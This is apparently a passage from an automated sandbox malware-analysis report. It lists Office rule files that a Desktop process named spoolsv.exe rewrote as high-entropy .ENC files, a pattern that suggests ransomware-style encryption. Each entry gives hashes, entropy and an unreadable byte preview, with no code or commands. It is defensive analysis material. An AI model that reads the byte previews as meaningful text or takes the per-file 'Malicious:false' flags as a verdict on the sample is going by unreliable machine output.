                                                                                                                                                                                                                                                      SHA-512:00CEBDC17E959BC72189A4FED5F15AFD0425C680059D461A3F28375AC4AB24D600BFE1D1E4B3FE2B35A80D45AFDDA93A9DA34A84CDD3BD8DC989403DB2BAF060
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f1..+....\9?......:...;.......H..r>,.bH-m.".b....Ax`X..[..0q:.w./...;-....Ne..mUt.J....C.N..]J[*...<.i......#.hyN0.\...o.n..0.....y"Q*.z..~.......o~..>.6....e3jM.(..N"}T7i."qu....K...I..........E~L..............-.$A.#{...m.v<...*.V.3..m....-..VtYX..)......vc.Ya&s..+....E.........1.._V]X.4_._r..1~.T._.$1.z....v.>.Oqs......*.7o...<..e.<.0....Y...u......M/z.{..jI...1..........~..wL+w..Q!.2].../x..N.. ...V.S..a..$.E..OG.....%^..zR..%.f.3...'.x....S...v)...(..l...^ .U;H.(.\....?..K.{.*........!%.&.Q.%......l(....:...M.OT..j...C...lY..J&?..0.o..1.?....d8....KU.JiA....S.f^.[.o[..",..{.....n.5z.._~ 2./5.}[...p.....l9$.Aj.t.X.h..|}...V..{.`Yl...XZ...s.*l.a@...?+K.$6F.5.T"{u..vnQ.r1@...Z.C+.2...D....9.*...i\ ..Q..F.....@e,.>..#..,.....^....A.d..E#<z.c.\..h.,..;.%........(|DFA._.Z..R..*Kp..'....;.4....x..hl.u9....\j......'..M...eN._vig.`...BO..~.Q.....F.Fb...G}..*..K....p..Z..7.Jj...Uh...@.\...|...*.CCn

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10955v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):912
                                                                                                                                                                                                                                                      Entropy (8bit):7.791769103173086
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++oWmWNCqixtHajwWrE1dBguoLHov7oRhFyKgSEzF:++JmWXipzCVjlQKgSEzF
                                                                                                                                                                                                                                                      MD5:027789426BD362CF33F0581885065014
                                                                                                                                                                                                                                                      SHA1:935E41062FD56E65901C55F66706BA78211E09B2
                                                                                                                                                                                                                                                      SHA-256:72645A71625561B023AF0BDBB55B55B4FD7B2E557A2D0DBC8514209DBB0991E7
                                                                                                                                                                                                                                                      SHA-512:7215B06BDB5CC13269FF7F63719175091B8C9D31467C182AE6349D7CA8035961495C2373F0C1BDD3B890C1B0632A275E4C5A4937B219FE71A9ADD035B81B2925
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..%gB.../b.u....g./...-..J..u..a#...B...@7UG..tmbkS1y7...N....L..Swu....6..h.r-U..z"c_=..%n.ap.......`...'...h.>.f.BU.:..l.k."/..l.-y../..T".w.......h\M.g%...-L.,...7..}..0E......W"..|.....`Hyh........~{X?kW.G...@+...-....o.P\p....^p}.U{...@.. A.P.2.....1....F.a0..P=.".:.z}....j..Q.l.wA....1.0.\cE.9..1..p.)).2......|>?4..38.....o.........m........,...nB.:V..; ../.*.....xI.\..A.}.Gjv.l.[.#zY..1Cw...O..Q.0X.H.5./...w..p......fV......'.l..M......L...Y..f.AS>SCSG..o.@...CZ<..........................x.@...>V.....*.kX.3:...c..V.. ..-l>%....U)..9....[.. ....;}.B.vT3.g..Iv...N...V.m...@.._..5..+.UJ.K.8.V .Qf[]m..K4d...e........^Y..r.N*,...aw..<..2v>.......A...9..=..x..94t....?..K..j.....r....4Q"dG.. .}..c3.../!.z.. 1`:.e...e.-.%..A....../p.'...wA5.O..g..R.......#L..,...>.-<.;..2.j..x.&_...}.(......(q

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11150v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):864
                                                                                                                                                                                                                                                      Entropy (8bit):7.798278353235367
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++JFpUReQtbrR0KTbUL3Z5MiNykxyVadEFc/q:++atbd0EIL3Z5LykyVadEFc/q
                                                                                                                                                                                                                                                      MD5:A224032B0E79EC13990F1FA191971163
                                                                                                                                                                                                                                                      SHA1:171960AF9F78BC2E365B84EC08F5D5B53828639A
                                                                                                                                                                                                                                                      SHA-256:2A88B8BC553AE3C90A8BE831D5AC87EE610F0B9436C87A1FF2B41B3B2CEB4EAD
                                                                                                                                                                                                                                                      SHA-512:91BF7C070DCF483E2DA8838A83D791EADFA1E4D26E973D846732697D6E5E94C2E2FE275CEE10EE787512A9ACA27EAE7DF349D6FCA4819135487DF2916DC77D81
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.n...3'&..$0..BV...M.y.a.r.g....[ou.....d.....[.................l5j{. .n....d."..$..+c.F..u.*....er".(...v....%..?[L..*..K..j:D.:.....U.t..........6.E..u......(8...O.....>~...(6.AO3&t.i.u..............a.x..S..R6.5.....,...~.x.....;.\.]...4v...ecz?K...Fg..K..L.NHDq...J.&r-..Z'.%.Xn..3c..H.u....2'./...y.b 7..q.....47.....y.!s....2Xw.#....N5..4a..1U...,......F.=.u.~.Q..j..hF......U....{4QJ4.j.>G.0..[yb....5.....y......n...^UOKw3......e.}J..I.2.+.X..K.G..q&A....\...I}F....*|...V7V.&l. <...h..P...4.C.....Yh./.n.z".#liN..H.L~9#...\.y5r.>....O@w1.1.#..m....m..,x....R...[KR..qL....(."...]._........=l'.t[.)F.u.{I.v....C.$e.}....c......o.,x. ^....\...<..ald -.-...!.......VEp;=...C....Fr...`.D..P.\.(...l..R..]...g(~..\........_.6....H...@j.t..<.9F.r..2F.......m....p.?..B..e.`

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11154v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):752
                                                                                                                                                                                                                                                      Entropy (8bit):7.722503732305146
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7Ijmih/k9Y4infD8bwWTKVLWkDTH4oYwdVlW8XkQHGai9Zu3ylZli3fi6VA:++kJl4GfDWwWGsk3RxdVljXnHGx9hLlt
                                                                                                                                                                                                                                                      MD5:9AC2201B833D18B7CFFA961F49402829
                                                                                                                                                                                                                                                      SHA1:C23561C0AD38EF8828FF5A2C37D8A91D77A96854
                                                                                                                                                                                                                                                      SHA-256:4D2ADD95DDFB6C43B423A49289AAAFDA0C46849EDFC436EB705737ECCE59FEE2
                                                                                                                                                                                                                                                      SHA-512:286B101C035ABC92F4820A9B71FEEDB320BDAD5A56D529CC6AA355CEE24D78D1C6A7E17C50439657C7BE120FD4009B9FAB2B1F9CFFB7267D6D51A77823C54272
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..... |....>l.y..I.*5<...@n....v..g.]...(.!.J1... m...2..8.x..y.i...2....F5?v>..{5.wW,I....1.RDTnD...6.;0J...V..Ag..yuq0...Cq?.t..~.[..I..RJ.....6..|..Ka.I.i.....IOgY.....3.e......'"..W.6Z..l.....*2.......E. ..MV..g..QXLM...m(Z.QS..G....@..@..{n:.7....L..#.f?J..E.....Q6.*..eB.....(!.O....[q...t&.....A.q.>.T.....C...D...O...._.Z...~s...{..s..6.!.3[l?.$eX<..h<...#/.%.:8...y.+~O.z...S..N.5U.<....:!.....d..../L.\....=y 6{{.R.....Vj......*.|..e".}~......]}gH8r.@r.G.......o,$.H.....M).{.J..^H...P...@......._E..c....A6n..+.c.81.1gld.?........;.3.4..~.......i.#....k.3'...Y..m1...ET..k7by9>....!....Ma.....l..+..{.X...L.._z..}*..}.. .`...o.A#F...a. $;...T..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11187v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2912
                                                                                                                                                                                                                                                      Entropy (8bit):7.938799405186635
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++p0+2bduX5BA4z2mTZTLxb0Dpulsu+5lF5tKk2dwNSirCQ2k3XrN6cHg/9J3dg:++e+28pqa2qBLxool0F5tYKf2bJ9Je
                                                                                                                                                                                                                                                      MD5:6367CDF9DD1C11040551A6101065335F
                                                                                                                                                                                                                                                      SHA1:55E6A154BC1E87309716BAD818FB15D12FA42BE8
                                                                                                                                                                                                                                                      SHA-256:C52EDA4B3F65FE0CA779617C64179AC75CA7234D49B09A6C9EF8F7D60AE6FF1B
                                                                                                                                                                                                                                                      SHA-512:F3D43AD0C22BFC1082EF255155D71FD2E358D714E648B506556D45A29721E50754BEF5F8843470A4010658A7F9B67D3188E110DC5FB60E2F89CB914AA4459594
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f\.q......8z.Y......i..i.{.=.._.Y........6.........n... E....=.l.V..t..i&...K..c....-..b..f...3f....w.....R.h.5.oV...F.-S.Dbal...`7.....3.F.j....w....s'.M..('.0.wO...z..>L..b.$.L....d..0........3.....Q.'...o..5... .)(.....}.....JOry...N...`.$l...i........Q....>H|r*_.8 ...G.G..SvB.. ...+...t.a.\\..dzx..uh<O...(U...$ +.~.w4..Vm. .+.Q......m<..!..>]..]iG7...O&V...8.vl44........;..\Z....rZ...,...oZ.4...l% .eR.......[..;..4*X...E.2U).q.zn..I.Bb<...9C..!.XF..@..G.z{z..<6.....$`M......8.6.G>..D1.9.s$\.).....}qF....._..a..,..Q..[..1*Vl0.g..LC.1..CL.]...s.;.....!.Bx.q.e...)].....+......?=..Mq.X.......e....[o..>.o.........q..|}M..$.....*za.w......h>......3..-.B..2...8.rYh\.#.l..E.*..%...,zI.piL.&.jZ.qV..........f....Z.T..t....E.%[........PD..a`x.../f.Cm.Y..z6.V%..k....5;..~G.8@..gg@).x\..f=..h..GH<..V[....i...i/=.qh."...W....<.%..s....\..PK.` 2..V.O...V....n..."O.;.. /..{..+.~..1.].U.xC..m.Y4..E.c..~....J.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11190v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):912
                                                                                                                                                                                                                                                      Entropy (8bit):7.739807826782389
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++uxaabELow2oSJJo4UK9lxRRL9x4bKuXa:++ugaESQC/RL97
                                                                                                                                                                                                                                                      MD5:06450B35922B4B4BAC4D632B4C14CCC7
                                                                                                                                                                                                                                                      SHA1:7B6425A538E82800C55B4CA1D0D4B974600FFD76
                                                                                                                                                                                                                                                      SHA-256:C6F9D3D46F927B1CF189E65797599AC1E7F25E7571FBDD360B20A159FDBB43F6
                                                                                                                                                                                                                                                      SHA-512:466D3678B46AC5A3214C5B649067393641901CB2987C199384477993DE32B726588BF8E66BF9E4FC4989DDB8A96D047DB18B23CEA79B9785F905D7595DE89A9E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.B.'..Lb......@....^D.^..&`.<.UY=.Na....\.Z..i.F..'u..o.]=b1.;F...........Kt...L...WW.B ...,e._f,..}......+.....H._..b...n..o..q. d..'!.^r.......g.s.X..`d.x.F......'...M^....E..cP.]......lt...w4..z....=......MH&....i........$...Z.R.li..g..tT=D..._%...>).X..+3.K....K..{..i/.-....pC.M~.xM{..`1)Q..p.;....04..).._Jq.....j.....>.F(.<. o.7..x/7....;...o.^......On.Q(.}'Yr.........9.Oy..UD]..x.!!&..d....D.mF."8.Q...p.!..@.. ...q:...d..M.....a.AqZ....D.Z.^.;|..c.u}..E.....-Y..nq8.}#.."......T.>).._.-.94_.F..s.x..\..K...._..v.M...a..\..NVJ-W..@......M.}.EX.i:]X8.&..D..kwg...7.[Y...>.....9p&..z....yt}..sbq.......l...w.u.....*.D#...;t...7..1.O.o..dBH.......`E....g.p......C...E......e.'.m....r.qw..\..N.J........a.}.SK|~s......y?@0..[..n...Kh./.e(..b..r....-..U9.......'.&.......C.d].......%...d.C.........z\@F@..:..\..A.e#D..D.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11195v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):7248
                                                                                                                                                                                                                                                      Entropy (8bit):7.976538532451564
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:++I+3puyY4wxFD4IzVK/EOFnaLWtlv/S+St:5ZdwDzgMO5j/SR
                                                                                                                                                                                                                                                      MD5:25A3902076B12932A681DE1A71D07912
                                                                                                                                                                                                                                                      SHA1:7726FA3765A63C46ECF47CDEB2853A092D8C6CD0
                                                                                                                                                                                                                                                      SHA-256:F98492D22D95D92D502E648B76A4E19620FE9DB0A218619259EA86A8E7D5A9E5
                                                                                                                                                                                                                                                      SHA-512:282B243C34FA124A6227981AAF2ADA44CE21E0FB09AAD6BDBCEF36E666AD13D04F3271EEE64FD29881FC45206A53C35728FBBFB73C2B7EF6D1B5CF4AB0FA1ED6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fd\..;....PU.Z.u;...%....^'QN.).F....*.R`....vBV.Q.G.H.....f_.......DYerZ..[.[....)v k..H...&.@.g.P.Y....)hT.XY..GuR:.*8.V...ZG..lw=.Xq.AM......P.....[taXq.J..W......Jbi..}.M.`k...K....6.....*Pw....#.Y.7..,,z.".C...%....S....dy...V...j..ca..E.'....tP...7h..F."a*..E.h1(Wg..&..~.s;......&.e.CL..Vr.U_...W.$'..f.x..R..).d.................C..u.B.j...v+..3t..a*..d..fq....:....Q..gd.."m.$..o..o.>...dB.U.n..\J"......"...A=...Ez.."t....!S'@.....d..8/......W....)....A...W.D...J.H.By.S..P..w..U4}9.,.+......4.......+...ffA...u..J.............~...6%..}0........eu....l...p.u..R/>.;...^.(...8./....y4.&..d.P.+...ftQ.;.i...9........cJ.K..).8.@.Q.@.b..._.$...g..J..C......J..(.....T-Z....`..:|9...p..9.E..L.?W.0....,H...g.lw.....;.%..K,(.b.N}..]!y.1.>b..B.......F!...{..L..G...k~.{@.Y .y.....%.z.~`....V....t$.{cxR....H..h.N.....|.%=.Z..e....!....GY....<.....9`;.A........Q2.wS.......x..x...Q....|....2.....n....:.K

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11208v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):496
                                                                                                                                                                                                                                                      Entropy (8bit):7.594573631297783
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmZaJ7VLbEI3VV2JwYR/oZ5lwldRYhOlGVTj7FI5v:++BL4I3VVcwW/Y5lwlN+WV
                                                                                                                                                                                                                                                      MD5:6ED799605241EA4B0FC17BE722071F27
                                                                                                                                                                                                                                                      SHA1:E481A056ECF1A8395B9CE5BA08247E1349CA9F0A
                                                                                                                                                                                                                                                      SHA-256:BC52C4E873D4EC00E771B2EA511166526CD7BF2CD3BE16DDEBE56C87774731A3
                                                                                                                                                                                                                                                      SHA-512:4E2453944BD8A92F2798EB2A5AB20DCD617A455D97399D88DEF6293A5EADD23E6CF2B56D719A60B9D3E2EFE21F68E9C37B4A1E1BB9141676E63BD48C514B220E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..T..s9.8-L^..C\....s../..`.~...{.H.`/...r.td,<.0....Rv.)..i.....c...{.i.. ./...\..45....W..-r].......p"..{.. ..CV.yG....0..l/.......#....^.*#..w..b.>.....jd.l:o.....v*.l...P.....A...!......t...i3M...0....:...D.d...D....R(..Ffc......rX4..{[4GMb....A.\.b.B+#.......|..<1.....P....D\`.c....[.._.?.e...=./[.h4..BS..]+nT.W..^.-.I.R../..<.......a...t..k.D....x2^;.= gN.....v..K.@_./.w9.......j.H.."..D{.._5.u.F.mR.....B@..6.5+..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11209v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1952
                                                                                                                                                                                                                                                      Entropy (8bit):7.904247052804336
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++matHcuMHNkGQ/XIDqEiYv844mMSnEm1XLZRmf+N:++o3ODYDqEiYk1pAEkXLZ0mN
                                                                                                                                                                                                                                                      MD5:54AC2E564F926B068873CD2E450FC1BB
                                                                                                                                                                                                                                                      SHA1:342138493C16EA4868BEB4B8A14A8764E6D57493
                                                                                                                                                                                                                                                      SHA-256:B17A4C12CE624DD83664F0F7821D061DDBCE91F60172E986C363279666D29A35
                                                                                                                                                                                                                                                      SHA-512:C232DBDCF3419380F2A9CDD060953CB10F489B105D77A1E4216A598AEF10084AF5DEA0663C919BE7CB2BBE775D1BE75AA9F1A96DD32020D727E653DFE8E2ECE3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..%..Y.i}..Y....Cq|.....J.L..."..".`.2..cy....R.......e8...1....p...z..;X..0.VG^"S.r.i\p].Mc../u..h3..+..LC.}.l.......~....*...uhl.5..6...}.o...............-.<.PUR`..o.<....8b8.>\ycr.p...o.{..;{...@Y[.v.?........k..l..6..c.,y..>..D..l"....4..O.....C...'=.\.N..-.)X.kZ...U........N)..8....g....#y.|..........[.x.B.r.^[.}1vG._f.v.N..h..3a....OOH......%.....7..$..~...2....K....y=o...B..!....@.~.:.[+s.y`.......W..N.$..E..4.S.Wfv..F.m.....E..Wo...% :.....8....)...q.I....%uX..oc.[b.o..../$....d/......AWV...m@t.......@h..=.G.-JRk.f..).]..?...n.]...~...^...h....s%F...l.....W.......G...a.CzR.oo'.mv..j.GR.}.....3vt..\..x/9.r.c.)..D#...Q...TP......I..q".U...dZ..V.....[Zem......z.VJ.9(Zp..Q.Y..C.A^..F....M......4..e'.3Rb0..j.......k......`a.\tz....?....3..h.xN...Tf....Z~.|8.....uO>......sW....*/."@.U1.u.0.#......yRn.h.^x..WU(P.}o.l...u ..eC3Z.......U..b.............5@W.$.U..l.S`P3..Z......2..!.a?(].

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11210v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):992
                                                                                                                                                                                                                                                      Entropy (8bit):7.794023099338871
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++2tTIPG3COqA4Nm9aoIE4HC6+KtnTswcAgW:++QT6AraotY+KtYwtB
                                                                                                                                                                                                                                                      MD5:654995EEDA247CDA347C2BA1F7737DC6
                                                                                                                                                                                                                                                      SHA1:0CC68C3B10D2DAC4D065A8B645F41CD1644DEAA4
                                                                                                                                                                                                                                                      SHA-256:5EEC67B9B9A6D06B15127370449CBD6211DA37469DAFA8B4715D523FAC767453
                                                                                                                                                                                                                                                      SHA-512:31EE87A7B3D2A731930CFB27F5439BB6CCFF2CC561201E0734A9486D2103D0F1B01B161BCD5D80ECA39FC5DDC4FF6C2DD74885DAE7EEC9CB9E0AE54E0F94ED84
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=fE.....jIMJ.fp..LO..1....e.. "..Y%...|...]..Z+H.I........^..)...........G.LFN....~..hC........-MW....S.4...O.......te.L....}..X.9.......P........D.JMaU9.2P........!S........E$.w.?..Q=....A.q .%C.W....;X...V..t~B.?A..e..../.y.r.ZP.]...v<.A.k.3..~...@..<....6Y.<..Q3P....<..4.)..-zV...)......F..Fv........._...w-.A.u...W.C.nl.s..9..Y[.K..m.=X.[.. .=.....W.rgR.'O ..RO..mb...x.."...."I......4:..2.~V....KC''.......58.%.j....`x.u....K.A..!,qmh.............xdj}.z.l.+....5..Vhs...<..Q.P.+.5.p..$..m......A"abw..]:....E..3.=....4TK.K-u3.r...H..T..)...Q.M1....*..P.b.ca......M..........A..."..<G... O.d..w.1n.+...........f.{.6G.-......B.F.....FQ..3AW.p..v.9.{.....^.G<..3.|......"h....P8..5@.;..?.........G*.m....A...jX.BJA.C.7..K.2....c.n.3.....|......a...r......1.._.U<y..A.Q*....S..H.5T.....B{...7e:.....X...t.QEKJ..r..{{.{..+8Qp..kec.FP=...P.A....&.....;...;,%.....i...w...u.o}..\-.8.....(.".

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11264v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2848
                                                                                                                                                                                                                                                      Entropy (8bit):7.927229336847615
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++rmiMNUcl+kPn+TD0L7j/kvSTIhYdz+JrvjjsDfbXAiejm21l6qL/UurpIZ:++rmi+Uq+4kuHISTIqdSJrvP6fjAid26
                                                                                                                                                                                                                                                      MD5:0C44486B9462592B9242EA16F3BE9E38
                                                                                                                                                                                                                                                      SHA1:9D890554D42E57DEA1794E3B4EE31483F30BA723
                                                                                                                                                                                                                                                      SHA-256:D9F3959243D0F2BEAE09F5025589E8EEE2DB8466EF70AFDF6B7B27357CCA08EF
                                                                                                                                                                                                                                                      SHA-512:89BE8D7C2449FF8EAF33EE4AA92CF43FFEE4E6F3C55A745BD2FA13427A2D8142D4BAD752D817C771462C804A50C9B9E7F14B6E7D21CC1124B7F04C41A958AD38
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f..[..Q...Q...?i.[N...G.I2...D_...P:L.uIn%.........j.........v...L.;...!.S5...7f.;_.A.`.<y3...I."m..{..<....w:..@..Po.JY..Q...K....)..\..!..2...>..s..._.n.K.oP.3.6...*..%..Xe\;q2..?.y.u8..@-.......0.B..H....C./Z."K.C....x.Hsf5.p9v...1s....yy..s.;.6.\2..Y.e.>JT3f....+......"B.".J~pCo..HA..C.!{%...V..3l.].!.b..;...7x..`r...........N..&l-....D]..C8/..(..!.`t."`.QK\o.GR#[P.8..FE/..._.2:.+@q\.C.i.Ju.n..C.u.k5..H.m...1luMC.+...J..QHE..`y#...^_.....?<../.T......uc.D...j.F.2...o.....h..BP....8......-..lW.3G%..8..].Ae...N......j...7.t3.{......N.=.....s......`......S9j%..hdH..1.._G....u.........~..e..X.C....Up].\"J...<.....UJ.........f+..{.9O...*.5.dr...3R....ClK...M.....]..0....DT[!lJ..[6..t..).......O..}Z.//f..&}......</..M:@.c.6./...?..p..h.%..&Mi...ao...].,....:^.'r...Q....Ns.UH1?.........*>.+=P(7z.+...=....[...Z....._JI......].q.t.t.~..q..jO0....o.^...%...%#:i.\T.......M...FW......?.,..!t."SLq,.:e.ot

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11265v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1776
                                                                                                                                                                                                                                                      Entropy (8bit):7.891466789750883
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:++Q3HtbcIpfOFFasr6qnZg8Qca5CMJrw9rKj8/i6:++Q3tlRTbhuMirKjt6
                                                                                                                                                                                                                                                      MD5:71BB10711352649F0AA3B9F51BE24D6F
                                                                                                                                                                                                                                                      SHA1:661E1E0740DD307D40BC41BD430EBAD2AA6D1A6A
                                                                                                                                                                                                                                                      SHA-256:5F927C45D361CF989C93DAB73361348D5CE3C23E78E4D9B28977613282148820
                                                                                                                                                                                                                                                      SHA-512:E49E678D79AAFEC2180D9BC1120D37581154CF22D78357E321841DF1CFAF42D06D893BFA60969258D37187B38BFEC16C9B322DC766B6476BACFE51DF15967016
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f......W..>.D....0.V.....I..F/..u..a.}..Ha..s-=?..........@R.>aU.0{]Z...C.(....f..9l.^.K.....|..7.._.... .......|<:j..[...........4...'e.a.7....5z..f...w).d$..V.......[...<O.g...I...W...s..>!...p.1.A..o.p.|...P'...Y_T....oX....d...p...=D.7......6..Lm....,...->...Xm=..y...9.jM..q,a.]..n%!h"..9...bHkM..._..I%.V#@X.l*.......#.J.....f....-..@....r..^3..&.N....]c.....]y.jjC.=...f.\.V/7.$.V.m9..!T.a...k.....&.S..]NIK@.../......X[B.|..m....Z..Ao...?.V..../.../...>.2`ZuF$7]...B..G.<O...q.!.Bc.].V.....0.*... .........jH.H.....7._.z.#.S.. ........SZ.H.g....2..I.....rh....@....8.S. ...!....s..8.X.YA6.....A.i.F..N..3...L8Y!N....d.....[qV.a;..|.._..2h..........,.. Y...4)..C..\96.t$.....nN.8.,rd%.:..h.*{;...T4r.9.bT.&.K&.d..UK..).u-....}s....L..}.....:.....s..'.D.h......;...;..P.{...U...tk2......H.E.+H/..I...)j.V?.d[n.+..#.yL.......P>.~...._.F..l....}z..q.4.E?..T....}T....,nO.-..$.N?......=......W.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11285v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):7200
                                                                                                                                                                                                                                                      Entropy (8bit):7.973145173171943
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:++Yf7JEPaNyx2lh80HQW+zfLw81nzoLBQ5:E9EPJxEvXqLtoLBQ5
                                                                                                                                                                                                                                                      MD5:1EF24823462A0E8C67BE31F3A6BCA749
                                                                                                                                                                                                                                                      SHA1:EFC58C5481C7A6F651E166B39E470424B266CC2B
                                                                                                                                                                                                                                                      SHA-256:9ABE46FD045518B4B0F3B2A04560A189BDB1A851A06FACD26938D6F3878E943C
                                                                                                                                                                                                                                                      SHA-512:2D822849271E9BDBA5CD0258AC35C9566E80B1C72B6AE01FD00746A2B54D294019E76377E4335C07DF7FDE6102455871083D0C65B26148D6CC425800F8DA1E6A
                                                                                                                                                                                                                                                      Malicious:false
